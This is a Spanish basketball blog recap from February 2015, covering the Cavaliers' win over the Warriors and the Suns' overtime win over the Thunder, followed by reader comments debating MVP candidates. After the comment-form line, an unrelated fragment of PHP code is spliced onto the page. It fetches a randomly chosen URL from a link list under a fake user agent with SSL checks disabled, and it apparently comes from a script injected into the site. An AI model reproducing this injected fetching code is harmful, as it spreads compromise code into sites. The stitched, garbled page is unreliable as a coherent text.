La crónica: Ya están aquíiiiiiiiiii

27 de February de 2015 por MagicJohnson32

Noche de jueves en la NBA, lo que suele implicar pocos partidos pero buenos. Muy buenos, de hecho. Nos fallaron los Warriors, grises en su visita a Cleveland, pero la emoción que le faltó a ese partido la compensó un Thunder-Suns de infarto. La jornada confirmó lo que ya veníamos anunciando: los Cavs, en su versión candidata a todo que les suponíamos de entrada, ya están aquí.

Os lo contamos.

cavs_gsw

Golden State Warriors 99 – Cleveland Cavaliers 110

Tenemos nuevo candidato al MVP. Tal vez les suene: es un tipo con un curioso caso de alopecia menguante que ha dominado la NBA en el último lustro con mano de hierro. Ya está aquí LeBron James y ya están aquí los Cavaliers que imaginábamos este verano. Han necesitado unos cuantos disgustos y un par de traspasos, pero están aquí para quedarse, como prueba su espectacular balance en los últimos 20 partidos disputados: 2 derrotas y 18 victorias, la última de ellas anoche ante el todavía mejor equipo de la competición. Los Warriors sucumbieron ante un LeBron que asegura que no se tomó el duelo ante Stephen Curry como una ocasión para reivindicarse como el MVP. No lo pareció. James desplegó toda su furia y recordó, a quien necesitase recordatorio, de qué es capaz. 42 puntos, 11 rebotes, 5 asistencias, 3 robos y 1 tapón certificaron el espectacular despliegue de LeBron, más si cabe ante el pobre rendimiento de los Splash Bros. Los Warriors habitan cómodamente en la primera plaza del Oeste, con 3,5 partidos de ventaja sobre Memphis, mientras los Cavs superan ya a los Bulls y alcanzan en número de victorias a los Raptors, que siguen segundos del Este… por poco tiempo. El único punto negativo de la jornada para Blatt: Kyrie Irving se dañó el hombro y es seria duda para la visita a Indianapolis.

Oklahoma City Thunder 113 – Phoenix Suns 117 (OT)

Vivir por Westbrook, morir por Westbrook. Ése es el plan estos días para los Thunder en ausencia de Durant, un plan que viene funcionando (no en vano, en este blog hemos reivindicado al base de OKC como candidato al MVP) y que ha alzado a los Thunder a posiciones de playoffs pero que no sirvió en Phoenix. Los Suns llegaban al compromiso en décima posición, a 2,5 partidos de su rival, por lo que se jugaban sus opciones de seguir en la carrera por la octava plaza del Oeste. A Eric Bledsoe no le pesó la responsabilidad y su sociedad con Kieff Morris lanzó a los suyos ya de inicio con un parcial 0-9 que se amplió hasta los 14 puntos (29-43). Cerca del descanso llegó la reacción visitante. Russell Westbrook, extremadamente fallón hasta entonces, empezó a ver aro y los Thunder se colocaron 7 arriba (64-57) antes de que Bledsoe, omnipresente, liderase la carga que parecía sentenciar el encuentro del lado local. Los Suns se vieron +10 con menos de seis minutos por jugarse, pero Bledsoe acusó la fatiga y Phoenix padeció cierto vértigo. La defensa de Serge Ibaka hizo acto de presencia y Westbrook forzó la prórroga con un 2+1 que respondía a otra jugada de tres puntos de Markieff Morris, pero en el tiempo extra el plan (ahora en serio ¿se le puede llamar plan?) de Brooks hizo aguas: el ataque de los Thunder se hizo demasiado previsible y los Suns pudieron recuperar un partido que les devuelve la esperanza.

westb

PREMIOS

MVP: Hoy comparten premio LeBron James y su versión mini. Los números de James ya los hemos detallado unas líneas más arriba (42-11-5-3-1) mientras que Eric Bledsoe condujo a los Suns a un triunfo fundamental con 28 puntos, 11 de 16 en tiros de campo, 13 rebotes, 9 asistencias, 1 robo y 4 tapones.

Sorpresa: Hasta hace poco no habría sido sorprendente que David Lee sea el máximo anotador de los Warriors. Hoy sí lo es. El PF anotó 19 puntos con 8 de 11 en tiros de campo, además de sumar 4 rebotes y 2 asistencias.

Decepción: Esperábamos grandes cosas de Steph Curry en una cita como la de anoche, ante los emergentes Cavs y con TV para todo el país. La decepción fue grande. 18 puntos pero 5 de 17 en tiros de campo, con 6 asistencias y 4 pérdidas de balón. Una noche mala la tiene cualquiera.

Mayor esfuerzo en vano: No se le puede negar a Rusell Westbrook que lo intentó. Lanzó 38 veces, de las cuales sólo acertó en 12 ocasiones, pero además anotó 14 de 16 en tiros libres y contribuyó con 14 rebotes, 11 asistencias y 3 recuperaciones.

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Pues si,no lo pareció,LeBron estuvo on fire durante toda la noche.Muy buena victoria para ir afianzando posiciones y sensaciones.Llegar al segundo puesto y evitar a Milwaukee o Washington en primera ronda es importante.Por cierto que como mola esa camiseta de los Cavaliers.

      Citar

  2. Jose Luis dice:
    #2

    Hoy está la cosa de tiramandarinas…

    Dellavedova 18 tiros??
    Wall 23??

    sendas derrotas por supuesto

      Citar

  3. Jose Luis dice:
    #3

    wall, 3 mas

    7-26 y 4 pérdidas

    #overrated

      Citar

  4. Jose Luis dice:
    #4

    Aron Brooks, 1-12 #KryptonateReturns

      Citar

  5. Ruxixón dice:
    #5

    Pensaba que era broma lo de Dellavedova,en fin,un poco justificado con la ausencia en el quinteto de LeBro.Tras la exhibición ante GSW televisada a nivel nacional,a descansar ante los Pacers.Dos derrotas en el mes de febrero ante ellos y por increíble que parezca,Indiana es el 8º del este.Con las noticias que hay sobre Paul George igual hay que verlos de otra manera.

      Citar

  6. luismi_vallecas dice:
    #6

    Vaya palizote de GSW a Toronto. Al final fueron 24 pero durante todo la segunda mitad no bajó de los 30, y en el primer cuarto Toronto solo anotó un tiro. Este partido debería ser un punto de inflexión para los canadienses, que llevan una rachita… Lowry y Derozan están muy bajos de forma y se nota. Al final del tercer cuarto hubo mimitos entre Hansbrough y Ezeli y expulsados los dos

      Citar

  7. Azabel dice:
    #7

    Ruxixón:
    por increíble que parezca,Indiana es el 8º del este.Con las noticias que hay sobre Paul George igual hay que verlos de otra manera.

    pues échale un vistazo al análisis previo

      Citar

  8. Nacho dice:
    #8

    Anoche se doctoró Hardem. Aún falta el real, el de los PO de verdad, pero camino va del cum laude.
    El muchacho sigue cayéndome más mal que bien, pero esta temporada está bestial. A Curry lo he visto menos. Box Score y Highligths sí, pero partidos enteros pocos. Por eso ahora mismo para mí, el MVP sería para la barba. No son solo los números, es el dominio y manejo (muy bueno ayer) del tempo del partido.
    Por cierto, ayer vi al LeBron 1.0. Al primer Cavalier, ese chupón que todo lo solucionaba él. Y falló. Cierto que tiene la excusa de la falta de Irving para su juego monotema, pero los Cavs llegaron con vida al final gracias a Love y Thompson (y al breve momento mágico de Jones) Si esta es la lectura de LeBron y Blatt para los PO (ayer fue un gran ensayo general) no le auguro nada bueno a los Cavs. Espero que les sirva de lección.

      Citar

  9. Futurman dice:
    #9

    Ayer Lebron aguanta el partido el solo desde el 3er cuarto, no jodamos. Que luego se llega a prorroga por que falla miles de libres y se pierde por lo mismo; pero él es el que resiste. Con Love desaparecido, J.R fallón, Irving roto y Mozgow inoperante; el único con puntos en el bolsillo era él.

      Citar

  10. Nacho dice:
    #10

    Futurman:
    Ayer Lebron aguanta el partido el solo desde el 3er cuarto, no jodamos. Que luego se llega a prorroga por que falla miles de libres y se pierde por lo mismo; pero él es el que resiste. Con Love desaparecido, J.R fallón, Irving roto y Mozgow inoperante; el único con puntos en el bolsillo era él.

    LeBron se va al banco 10 abajo, y vuelve en el último cuarto con el partido igualado. Love inoperante cuando James decide (y todo el equipo, ojo) que se la juega él. porque 21 puntos no me parece inoperancia. Teniendo en cuenta que los 10 o 12 últimos minutos apenas le llega algún balón. Pero vamos, si te parecen normales 35 tiros y que meta 15, pues vale. En la misma situación Hardem involucró al equipo.

      Citar

  11. Nacho dice:
    #11

    Y lo de Mozgov pregúntaselo a Blatt, bastante me jodió a mí, que lo tengo en la fantasy.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>